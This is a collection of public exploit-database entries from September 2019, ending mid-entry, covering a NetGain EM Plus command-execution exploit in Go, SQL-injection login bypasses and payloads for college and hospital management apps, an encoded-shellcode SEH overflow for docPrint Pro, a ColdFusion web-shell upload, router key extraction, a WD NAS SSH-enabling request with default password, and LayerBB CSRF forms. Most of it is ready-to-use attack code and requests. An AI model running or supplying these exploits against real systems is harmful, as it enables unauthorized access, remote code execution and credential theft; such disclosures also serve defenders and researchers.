
  /********************************************************************************
# Exploit Title: NetGain EM Plus <= v10.1.68 - Unauthorized Local File Inclusion
# Date: 15 September 2019
# Exploit Author: azams / @TheRealAzams
# Vendor Homepage: http://netgain-systems.com
# Software Link: http://www.netgain-systems.com/free/
# Version: v10.1.68
# Tested on: Linux
#
# Install golang: https://golang.org/doc/install
# Compile exploit: go build exploit.go
# Run exploit without compiling: go run exploit.go
# Shouts: Rix, Channisa, Ridho7ul & Horangi!
*********************************************************************************/

// NOTE(review): the title says Local File Inclusion, but what this program
// exercises is script_test.jsp running a posted "sh" script. The request
// carries no credentials at all (no Authorization header, no cookie), which is
// what the "Unauthorized" in the title refers to. For detection purposes the
// traffic is a POST to /u/jsp/designer/script_test.jsp with a
// form-urlencoded body holding the fields args, content, count, ip and
// type=sh (url.Values.Encode emits them sorted by key).

package main

import (
	"crypto/tls"
	"fmt"
	"io/ioutil"
	"net/http"
	"net/url"
	"os"
	"strings"
)

// Command-line state filled in by main. cmd starts out as the user-supplied
// command and is rewritten by main into the complete form body that exploit
// posts.
var (
	target string
	port   string
	cmd    string
)

// main parses -u, -p and -cmd from os.Args, builds the form body, calls
// exploit and prints whatever sits between the two 0xdeadnoob markers in the
// response body.
func main() {
	// NOTE(review): os.Args[i+1] is read without a bounds check, so a flag
	// given as the last argument panics with an index out of range.
	for i := range os.Args {
		if os.Args[i] == "-u" {
			target = os.Args[i+1]
		} else if os.Args[i] == "-p" {
			port = os.Args[i+1]
		} else if os.Args[i] == "-cmd" {
			cmd = os.Args[i+1]
		}
	}
	// NOTE(review): `||` lets the request go out when only one of the three
	// flags was supplied; with -u or -p missing the URL built in exploit is
	// malformed.
	if target != "" || port != "" || cmd != "" {
		// Form body: a "sh" script that echoes the marker 0xdeadnoob, then
		// the supplied command, then the marker again, so the command output
		// can be cut out of the response with strings.Split below.
		cmd = "type=sh&content=%232Fbin%2Fsh%0Aecho+'0xdeadnoob'%0a" + cmd + "%0aecho+'0xdeadnoob'&args=&count=0&ip=localhost"
		status, body := exploit()
		if strings.Contains(status, "200") {
			fmt.Println("Status Code: " + status)
			result := strings.Split(body, "0xdeadnoob")
			// NOTE(review): result[1] is used without checking len(result);
			// a 200 response that does not contain the marker panics here.
			fmt.Println("Result: \n" + strings.Trim(result[1], "\n"))
			return
		}
		fmt.Println("Exploit failed!")
	} else {
		fmt.Println("Usage: ./exploit -u http://127.0.0.1 -p 8181 -cmd 'id;'")
	}
}

// exploit POSTs the form body held in cmd to
// target:port/u/jsp/designer/script_test.jsp and returns the response status
// line and body. TLS certificate verification is disabled
// (InsecureSkipVerify), so the client accepts any certificate the server
// presents.
func exploit() (string, string) {
	tbTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}
	client := &http.Client{Transport: tbTransport}
	// NOTE(review): the errors from ParseQuery and NewRequest are assigned to
	// err and then overwritten; only client.Do's error is checked. A nil req
	// from NewRequest would panic at req.Header.Set.
	datas, err := url.ParseQuery(cmd)
	req, err := http.NewRequest("POST", target+":"+port+"/u/jsp/designer/script_test.jsp", strings.NewReader(datas.Encode()))
	req.Header.Set("Content-type", "application/x-www-form-urlencoded")
	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()
	// ioutil.ReadAll is deprecated since Go 1.16 (io.ReadAll); the read
	// error is discarded, so a truncated body is returned as-is.
	body, _ := ioutil.ReadAll(resp.Body)
	return resp.Status, string(body)
}
  2. # Exploit Title: College-Management-System 1.2 - Authentication Bypass # Author: Cakes # Discovery Date: 2019-09-14 # Vendor Homepage: https://github.com/ajinkyabodade/College-Management-System # Software Link: https://github.com/ajinkyabodade/College-Management-System/archive/master.zip # Tested Version: 1.2 # Tested on OS: CentOS 7 # CVE: N/A # Description: # Easy authentication bypass vulnerability in the application # allowing the attacker to log in as the school principal. # Simply replay the Burp request below or use curl. # Payload: ' or 0=0 # POST /college/principalcheck.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://TARGET/college/principalcheck.php Content-Type: application/x-www-form-urlencoded Content-Length: 36 Cookie: PHPSESSID=9bcu5lvfilimmvfnkinqlc61l9; Logmon=ca43r5mknahus9nu20jl9qca0q Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 emailid='%20or%200%3d0%20#&pass=asdf
  3. #-----------------------------------------------------------------------------# # Exploit Title: AppXSvc - Arbitrary File Security Descriptor Overwrite (EoP) # # Date: Sep 4 2019 # # Exploit Author: Gabor Seljan # # Vendor Homepage: https://www.microsoft.com/ # # Version: 17763.1.amd64fre.rs5_release.180914-1434 # # Tested on: Windows 10 Version 1809 for x64-based Systems # # CVE: CVE-2019-1253 # #-----------------------------------------------------------------------------# Summary: AppXSvc improperly handles file hard links, resulting in a low privileged user being able to take 'Full Control' of an arbitrary file, leading to elevation of privilege. Description: An elevation of privilege vulnerability exists when the AppX Deployment Server (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841, originally reported by Nabeel Ahmed, I found that AppXSvc sometimes opens the settings.dat[.LOGx] files of Microsoft Edge for a restore operation that modifies the security descriptor of the files. Further analysis revealed that the restore operation can be triggered on demand by preventing AppXSvc from accessing the settings.dat[.LOGx] files. This can be achieved by locking the settings.dat[.LOGx] file, resulting in 'Access Denied' and 'Sharing Violation' errors when Edge and AppXSvc try to access it. Eventually the restore operation kicks in, and if the settings.dat[.LOGx] file has been replaced with a hard link, AppXSvc will overwrite the security descriptor of the target file. A low privileged user can leverage this vulnerability to take 'Full Control' of an arbitrary file. Steps to reproduce: 1. Terminate Edge. 2. Create a hard link from settings.dat.LOG2 to C:\Windows\win.ini. 3. Open the hard link for reading and lock the file. 4. Start Edge and wait a few seconds for the restore operation to kick in. 5. Unlock the file and close the file handle. Expected result: Full access (GENERIC_ALL) to C:\Windows\win.ini is denied. 
Observed result: C:\Windows\win.ini has had its security descriptor rewritten to grant 'Full Control' to the low privileged user. PoC files: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47389.zip References: https://github.com/sgabe/CVE-2019-1253 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1253 https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841
  4. # Exploit Title: Inteno IOPSYS Gateway 3DES Key Extraction - Improper Access Restrictions # Date: 2019-06-29 # Exploit Author: Gerard Fuguet ([email protected]) # Vendor Homepage: https://www.intenogroup.com/ # Version: EG200-WU7P1U_ADAMO3.16.4-190226_1650 # Fixed Version: EG200-WU7P1U_ADAMO3.16.8-190820_0937 # Affected Component: SIP password, Info Gathering of Network Config # Attack Type: Remote # Tested on: Kali Linux 2019.2 against an Inteno EG200 Router # CVE : CVE-2019-13140 # Description: Inteno EG200 routers running firmware EG200-WU7P1U_ADAMO3.16.4-190226_1650 and earlier have a JUCI ACL misconfiguration that allows the "user" account to extract the 3DES key via JSON commands to ubus. The 3DES key is used to decrypt the provisioning file provided by Adamo Telecom on a public URL via cleartext HTTP. # Attack Vectors: To exploit this successfully, two components are required: 1. the encrypted file (.enc) and 2. the 3DES key to decrypt it. The encrypted file can be downloaded via an HTTP URL offered by Adamo ISP (works from any external network). Then it is necessary to interact with the router over the WebSocket protocol to obtain the 3DES key; a web browser like Firefox can be used as a WebSocket client from its developer tools. The session ID is acquired with the router's own username and password (in this case, the password is the same as the Wi-Fi default). Once the 3DES key is obtained through a JSON request, the .enc file can be decrypted with the openssl tool. # PoC: Step 1: Getting the provisioning file Download from http://inteno-provisioning.adamo.es/XXXXXXXXXXXX.enc Where XXXXXXXXXXXX is your router’s Inteno MAC, all in capitals and without the colons. You can also get your MAC by pinging the router and then running the arp command in a terminal. Step 2: The 3DES Key Let's communicate over WebSockets - Using Firefox, open the router’s webpage (192.168.1.1 by default). - Invoke the developer tools by pressing F12 and go to the Console tab. 
- Let’s create the WebSocket: var superSocket = new WebSocket("ws://192.168.1.1/", "ubus-json") - And create the log to show the response to each request: superSocket.onmessage = function (event) {console.log(event.data)} - We request a session ID with the same login parameters used when accessing the router’s website (put your router’s Wi-Fi password in place of the wifis-password value): superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["00000000000000000000000000000000","session","login",{"username":"user","password":"wifis-password"}],"id":666})) - Now you will obtain a response; the value of the “ubus_rpc_session” parameter is your session’s ID. Copy it for use in the next request. - Requesting information about the router’s system (put your session ID in place of the put-your-session-id-here value): superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["put-your-session-id-here","router.system","info",{}],"id":999})) - From the response obtained, copy the value of the “des” parameter. It is 16 digits that we need to convert to hexadecimal. Step 3: Ready for Decrypting Convert to HEX using the xxd tool, where XXXXXXXXXXXXXXXX is your "des" key: echo -n XXXXXXXXXXXXXXXX | xxd -p - Use the openssl tool to decrypt your provisioning file. (Put your "des" key in place of the your-des-key-in-hex-format value; XXXXXXXXXXXX refers to the name of your encrypted provisioning file, and in the -out value the name can be different): openssl enc -d -des-ede -nosalt -K your-des-key-in-hex-format -in XXXXXXXXXXXX.enc -out XXXXXXXXXXXX.tar.gz - Uncompress the decrypted file: tar -xzvf XXXXXXXXXXXX.tar.gz - You get the file: Provisioning.conf. - Show the file: cat Provisioning.conf - The end of the line is the secret, the password of your SIP account. 
A video was created to show all these steps in action: https://youtu.be/uObz1uE5P4s # Additional Information: A packet sniffer like Wireshark can be used to retrieve the 3DES key instead of using the WebSocket protocol. In that case, the user needs to log in on the router's page, and the JSON request containing the 3DES key will then be captured. # References: https://twitter.com/GerardFuguet/status/1169298861782896642 https://www.slideshare.net/fuguet/call-your-key-to-phone-all # Timeline: 2019-06-29 - White Paper done 2019-07-01 - CVE assigned 2019-07-09 - Notified to Inteno 2019-07-11 - Adamo aware and asks for detailed info 2019-07-12 - Info facilitated 2019-07-25 - Early patch available and applied (Cooperation starts) 2019-07-26 - Tested and failed (VoIP not working) 2019-08-27 - New firmware available 2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router 2019-08-31 - Tested OK 2019-09-04 - Disclosure published
  5. ===========Security Intelligence============ # Vendor Homepage: adobe.com # Version: 2018 # Tested on: Adobe ColdFusion 2018 # Exploit Author: Pankaj Kumar Thakur (Nepal) ==========[Table of Contents]============== * Overview * Detailed description * Thanks & Acknowledgements * References ==========[Vulnerability Information]======== * Unrestricted file upload in Adobe ColdFusion 2018 * CWE-434 * Base Score: 6.8 MEDIUM * Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H =========[ Overview]========================= * System Affected: Adobe ColdFusion 2018 * Impact: Unrestricted file upload =====[ Detailed description]================= Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code. Request POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 Host: hostname:portno User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 Content-Type: multipart/form-data; Content-Length: 303 Connection: close Upgrade-Insecure-Requests: 1 . . -----------------------------24464570528145 Content-Disposition: form-data; name="file"; filename="shell_file with extension" Content-Type: image/jpeg shell code -----------------------------24464570528145 Content-Disposition: form-data; name="path" . . After uploading shell, its located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file with extension =====[ Thanks & Acknowledgements]======================================== * Acknowledged by Adobe * Duplicate * https://nvd.nist.gov/vuln/detail/CVE-2016-10258 * https://www.cvedetails.com/cve/CVE-2016-1713/ * https://www.openwall.com/lists/oss-security/2016/01/12/4 =====[ EOF ]===========================================================
  # Local SEH-overwrite PoC for docPrint Pro 8.0: builds a 6000-character string
# (filler, SEH overwrite, stack realignment, an encoded MessageBox payload) and
# writes it to bajablast.txt, to be pasted into the password fields described
# under TO RUN. Per the author's comments the only payload is a MessageBox call.
import struct

# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: September 14th, 2019
# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io)
# Vendor Homepage: http://www.verypdf.com
# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10 and Windows 7

# TO RUN:
# 1. Create a blank file named "test.pdf"
# 2. Open doc2pdf_win.exe
# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File"
# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay"
# 5. Click "Add File(s)"
# 6. Select the "test.pdf" file created from step 1.
# 7. Press on "Start" and name the file "exploit.pdf"

# Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII)

# Zero out registers for calculations.
# Two "and eax, imm32" instructions whose masks (0x01010101 and 0x10101010)
# share no bits, so eax is 0 afterwards whatever it held before.
zero = "\x25\x01\x01\x01\x01"
zero += "\x25\x10\x10\x10\x10"

# Stack alignment: copy esp into eax, subtract three constants, and copy the
# result back into esp.
alignment = "\x54"                  # push esp
alignment += "\x58"                 # pop eax
alignment += "\x2d\x1a\x50\x55\x55" # sub eax, 0x1a505555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x50"                 # push eax
alignment += "\x5c"                 # pop esp

# Custom created and encoded MessageBox POC shellcode.
# Utilized application DLL with no ASLR for Windows API call to MessageBox function.
# Decoded bytes the groups below reconstruct. Each group zeroes eax, subtracts
# three constants and pushes the result, producing one 4-byte dword of this
# sequence; the groups run from the last dword to the first.
# \x31\xc0\x50\x68
# \x42\x41\x4a\x41
# \x89\xe1\x50\x68
# \x42\x41\x4a\x41
# \x89\xe2\x50\x50
# \x51\x52\x50\xbe
# \x38\x20\x00\x10
# \xff\xe6\x41\x41

# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!)
shellcode = zero                    # zero out eax
shellcode += "\x2d\x55\x15\x4f\x53" # sub eax, 0x534f1555
shellcode += "\x2d\x55\x02\x4f\x53" # sub eax, 0x534f0255
shellcode += "\x2d\x57\x01\x50\x53" # sub eax, 0x53500157
shellcode += "\x50"                 # push eax

# 4F554A42 4F554A42 51554B44
shellcode += zero                   # zero out eax
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x44\x4b\x55\x51" # sub eax, 0x51554b44
shellcode += "\x50"                 # push eax

# 153A393A 153A393A 173B3B3B
shellcode += zero                   # zero out eax
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a (little-endian of the bytes; the original comment said 0x173b3b3b)
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a
shellcode += "\x2d\x3b\x3b\x3b\x17" # sub eax, 0x173b3b3b
shellcode += "\x50"                 # push eax

# 3A3A1927 3A3A0227 3B3B0229
shellcode += zero                   # zero out eax
shellcode += "\x2d\x27\x19\x3a\x3a" # sub eax, 0x3a3a1927
shellcode += "\x2d\x27\x02\x3a\x3a" # sub eax, 0x3a3a0227
shellcode += "\x2d\x29\x02\x3b\x3b" # sub eax, 0x3b3b0229
shellcode += "\x50"                 # push eax

# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero                   # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50"                 # push eax

# 323A1A27 323A0227 333B0229
shellcode += zero                   # zero out eax
shellcode += "\x2d\x27\x1a\x3a\x32" # sub eax, 0x323a1a27
shellcode += "\x2d\x27\x02\x3a\x32" # sub eax, 0x323a0227
shellcode += "\x2d\x29\x02\x3b\x33" # sub eax, 0x333b0229
shellcode += "\x50"                 # push eax

# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero                   # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50"                 # push eax

# 323A1545 323A1545 333B1545
shellcode += zero                   # zero out eax
shellcode += "\x2d\x45\x15\x3a\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3A\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3b\x33" # sub eax, 0x333b1545
shellcode += "\x50"                 # push eax

# Let's roll.
payload = "\x41" * 1676                  # filler; presumably the distance to the SEH record — see the title
payload += "\x70\x06\x71\x06"            # JO 6 bytes. If fails, JNO 6 bytes
payload += struct.pack('<L', 0x10011874) # pop ebp pop ebx ret reg.dll
payload += "\x41" * 2                    # Padding to reach alignment
payload += alignment
payload += shellcode
payload += "\x45" * (6000-len(payload))  # pad to a fixed total of 6000 characters

# Write to file
# NOTE(review): opened in text mode and written as str — presumably a Python 2
# script where str is a byte string; under Python 3 confirm the written bytes.
f = open('bajablast.txt', 'w')
f.write(payload)
f.close()
  7. # Exploit Title: Notepad++ all x64 versions before 7.7. Remote memory corruption via .ml file. # Google Dork: N/A # Date: 2019-09-14 # Exploit Author: Bogdan Kurinnoy ([email protected]) # Vendor Homepage: https://notepad-plus-plus.org/ # Version: < 7.7 # Tested on: Windows x64 # CVE : CVE-2019-16294 # Description: SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file. Open aaaaa.ml via affected notepad++ POC files: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47393.zip Result: (230.c64): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Notepad++\SciLexer.dll - rax=00007ff8e64014c0 rbx=00000000000aaaaa rcx=00000000000aaaaa rdx=0000000000000003 rsi=0000000000000000 rdi=00000000ffffffff rip=00007ff8e63c071d rsp=000000aa06463d60 rbp=000000aa06463e81 r8=0000000000002fc8 r9=0000000000000000 r10=000000000000fde9 r11=000000aa06463d90 r12=0000000000000000 r13=0000000000000000 r14=0000000000000001 r15=0000000000000002 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 SciLexer!Scintilla_DirectFunction+0x950dd: 00007ff8e63c071d 0fb70458 movzx eax,word ptr [rax+rbx*2] ds:00007ff8e6556a14=????
  8. # Exploit Title: CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection # Author: Cakes # Discovery Date: 2019-09-16 # Vendor Homepage: https://github.com/SaloniKumari123/CollegeManagementSystem # Software Link: https://github.com/SaloniKumari123/CollegeManagementSystem/archive/master.zip # Tested Version: 1.3 # Tested on OS: CentOS 7 # CVE: N/A # Description: # Another College Management system coded in PHP, most input values accounted for and sanitized, except this one :-) # Parameter: batch (GET) # Type: boolean-based blind # Title: OR boolean-based blind - WHERE or HAVING clause Payload: batch=-9643' OR 9247=9247-- aqgq # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: batch=2021' AND (SELECT 6451 FROM (SELECT(SLEEP(5)))CWMt)-- zEfe # Type: UNION query # Title: Generic UNION query (NULL) - 3 columns Payload: batch=2021' UNION ALL SELECT NULL,CONCAT(0x71786a6271,0x564f6e51546c6f634741454d714e5777716d427361504d7a794b686c50657472724d616f49674b51,0x7171627171),NULL-- pPUb
  9. # Exploit Title: Hospital-Management 1.26 - 'fname' SQL Injection # Author: Cakes # Discovery Date: 2019-09-18 # Vendor Homepage: https://github.com/Mugerwa-Joseph/hospital-management # Software Link: https://github.com/Mugerwa-Joseph/hospital-management/archive/master.zip # Tested Version: 1.26 # Tested on OS: CentOS 7 # CVE: N/A # Discription: # Simple SQL injection after application authentication. # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: fname=tester'||(SELECT 0x72516679 FROM DUAL WHERE 9119=9119 AND 1379=1379)||'&sname=tester&[email protected]&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Payload: fname=tester'||(SELECT 0x53495778 FROM DUAL WHERE 5761=5761 AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x71787a7a71,(SELECT (ELT(9648=9648,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&sname=tester&[email protected]&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: fname=tester'||(SELECT 0x5144494b FROM DUAL WHERE 1043=1043 AND (SELECT 1880 FROM (SELECT(SLEEP(5)))AmmF))||'&sname=tester&[email protected]&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add
  10. # Exploit Title: Western Digital My Book World II NAS <= 1.02.12 - Broken Authentication to RCE # Google Dork: intitle:"My Book World Edition - MyBookWorld" # Date: 19th Sep, 2019 # Exploit Author: Noman Riffat, National Security Services Group (NSSG) # Vendor Homepage: https://wd.com/ # Software Link: https://support.wdc.com/downloads.aspx?p=130&lang=en # Version: <= 1.02.12 # Tested on: Firmware # CVE : CVE-2019-16399 POST /admin/system_advanced.php?lang=en HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 Content-Length: 241 orig_ssl_key=&orig_ssl_certificate=&submit_type=ssh&current_ssh=&enablessh=yes&Submit=Submit&ssl_certificate=Paste+a+signed+certificate+in+X.509+PEM+format+here.&ssl_key=Paste+a+RSA+private+key+in+PEM+format+here.&hddstandby=on&ledcontrol=on /* The default password for SSH is 'welc0me', and the only security measure preventing SSH login is the disabled SSH port, which can be enabled with the above POST request. The attacker can then log in to the SSH port with the default password. The WD My Book World II NAS is very outdated hardware and Western Digital may never release an update for it. It is still using PHP 4, so it has more potential for remote exploits. All firmwares listed at https://support.wdc.com/downloads.aspx?p=130&lang=en are vulnerable. An update is probably not coming; if you want to remain safe, abandon this NAS and switch to the latest hardware. */ Security Researcher - Noman Riffat, National Security Services Group (NSSG) @nomanriffat, @nssgoman
  11. # macOS-Kernel-Exploit ## DISCLAIMER You need to know the KASLR slide to use the exploit. Also SMAP needs to be disabled which means that it's not exploitable on Macs after 2015. These limitations make the exploit pretty much unusable for in-the-wild exploitation but still helpful for security researchers in a controlled lab environment. This exploit is intended for security research purposes only. ## General macOS Kernel Exploit for CVE-????-???? (currently a 0day. I'll add the CVE# once it is published ;) ). Thanks to @LinusHenze for this cool bug and his support ;P. ## Writeup Probably coming soon. If you want to try and exploit it yourself, here are a few things to get you started: - VM: Download the macOS installer from the appstore and drag the `.app` file into VMWare's `NEW VM` window - Kernel Debugging setup: http://ddeville.me/2015/08/using-the-vmware-fusion-gdb-stub-for-kernel-debugging-with-lldb - Have a look at the _kernel_trap function ## Build I recommend setting the bootargs to: `debug=0x44 kcsuffix=development -v ` :warning: **Note**: SMAP needs to be disabled on macs after 2015 (`-pmap_smap_disable`) You will need XCODE <= 9.4.1 to build the exploit. (It needs to be 32bit) Downloading Xcode 9.4.1 Commandline Tools should be enough ;) Download: https://developer.apple.com/download/more/ ``` make ``` ## Execution ``` ./exploit <KASLR slide> ``` Tested on macOS Mojave: `Darwin Kernel-Mac.local 18.7.0 Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/DEVELOPMENT_X86_64 x86_64` **Demo**: [![asciicast](https://asciinema.org/a/UBmByRiRR0y5USBwuHKC5X7GU.png)](https://asciinema.org/a/UBmByRiRR0y5USBwuHKC5X7GU) - - - EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47400.zip
  12. # Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection # Date: 2019-09-19 # Exploit Author: n1x_ [MS-WEB] # Vendor Homepage: http://www.digit-rs.com/ # Product Homepage: http://digit-rs.com/centris.html # Version: Every version # CVE : N/A # Vulnerable parameters: datum1, datum2, KID, PID # [POST REQUEST] POST /korisnikinfo.php HTTP/1.1 Content-Length: 65 Content-Type: application/x-www-form-urlencoded Referer: http://host Host: host Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"
  13. # Exploit Title: LayerBB 1.1.3 - Multiple CSRF # Date: 4/7/2019 # Author: 0xB9 # Twitter: @0xB9Sec # Contact: 0xB9[at]pm.me # Software Link: https://forum.layerbb.com/downloads.php?view=file&id=30 # Version: 1.1.3 # Tested on: Ubuntu 18.04 # CVE: CVE-2019-16531 1. Description: LayerBB is a free open-source forum software, multiple CSRF vulnerabilities were found such as editing user profiles and forums. 2. Proof of Concepts: <!-- Edit Usergroup CSRF --> <form action="http://localhost/admin/edit_usergroup.php/id/1" method="POST" style="padding: 25px;"> <label for="g_name">Name</label> <input type="text" name="g_name" id="g_name" value="User" class="form-control"> <label for="g_style">Style <small><code>%username%</code> will be replaced with the user's username.</small></label> <textarea name="g_style" id="g_style" class="form-control"><span>%username%</span></textarea> <label for="b_style_s">Banner Style Start</label> <textarea name="b_style_s" id="b_style_s" class="form-control"><span class="label label -default"></textarea> <label for="b_style_e">Banner Style End</label> <textarea name="b_style_e" id="b_style_e" class="form-control"></span></textarea> <label for="permissions">Permissions</label><br> <input type="checkbox" name="permissions[]" value="1" checked=""> view_forum<br><input type="checkbox" name="permissions[]" value="2" checked=""> create_thread<br><input type="checkbox" name="permissions[]" value="3" checked=""> reply_thread<br><input type="checkbox" name="permissions[]" value="4"> access_moderation<br><input type="checkbox" name="permissions[]" value="5"> access_administration<br> <br> <input type="checkbox" name="is_staff" value="1"> This Usergroup is staff. 
<br> <input type="submit" name="update" value="Save Changes" class="btn btn-default"> </form> <!-- Edit Usergroup CSRF End --> <!-- Edit User CSRF --> <form action="http://localhost/admin/edit_user.php/id/1" method="POST" style="padding: 25px;"> <label for="username">Username</label> <input type="text" name="username" id="username" value="Administrator" class="form-control"> <label for="email">Email Address</label> <input type="text" name="email" id="email" value="[email protected]" class="form-control"> <label for="usermsg">User Message</label> <input type="text" name="usermsg" id="usermsg" value="User" class="form-control"> <label for="signature">User Signature</label> <textarea id="editor" name="signature" class="form-control" style="min-height:250px;"></textarea> <label for="disabled">User Activated</label><br> <input type="radio" name="disabled" value="0" checked=""> Do Not Change<br> <input type="radio" name="disabled" value="0"> Active<br> <input type="radio" name="disabled" value="1"> Disabled<br> <br> <label for="usergroup">Usergroup</label><br> <select name="usergroup" id="usergroup" style="width:100%;"> <option value="4" selected="">Dont Change</option> <option value="1">User</option><option value="2">Banned</option><option value="3">Moderator</option><option value="4">Administrator</option> </select><br><br> <input type="submit" name="update" value="Save Changes" class="btn btn-default"> </form> <!-- Edit User CSRF End --> <!-- Edit Category CSRF --> <form action="http://localhost/admin/edit_category.php/id/1" method="POST" style="padding: 25px;"> <label for="cat_title">Title</label> <input type="text" name="cat_title" id="cat_title" value="First Category" class="form-control"> <label for="cat_desc">Description</label> <textarea name="cat_desc" id="cat_desc" class="form-control">First category on this forum!</textarea> <br> <label for="allowed_usergroups">Allowed Usergroups</label><br> <input type="checkbox" name="allowed_ug[]" value="0" checked=""> 
Guest<br><input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2"> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input type="checkbox" name="allowed_ug[]" value="4" checked=""> Administrator<br> <br> <input type="submit" name="update" value="Save Changes" class="btn btn-default"> </form> <!-- Edit Category CSRF End --> <!-- Edit Node CSRF --> <form action="http://localhost/admin/edit_node.php/id/1" method="POST" style="padding: 25px;"> <label for="cat_title">Title</label> <input type="text" name="node_title" id="cat_title" value="First Node" class="form-control"> <label for="cat_desc">Description</label> <textarea name="node_desc" id="cat_desc" class="form-control">The first node on this forum</textarea> <label for="parent">Parent</label><br> <select name="node_parent" id="parent" style="width:100%;"> <option value="1" selected="">First Category</option> </select> <br> <label for="additional_option">Additional Options</label><br> <input type="checkbox" name="lock_node" value="1" id="lock_node"> <label style="font-weight: normal;" for="lock_node">Lock Node</label> <br> <label for="allowed_usergroups">Allowed Usergroups</label><br> <input type="checkbox" name="allowed_ug[]" value="0" checked=""> Guest<br><input type="checkbox" name="allowed_ug[]" value="1" checked=""> User<br><input type="checkbox" name="allowed_ug[]" value="2"> Banned<br><input type="checkbox" name="allowed_ug[]" value="3" checked=""> Moderator<br><input 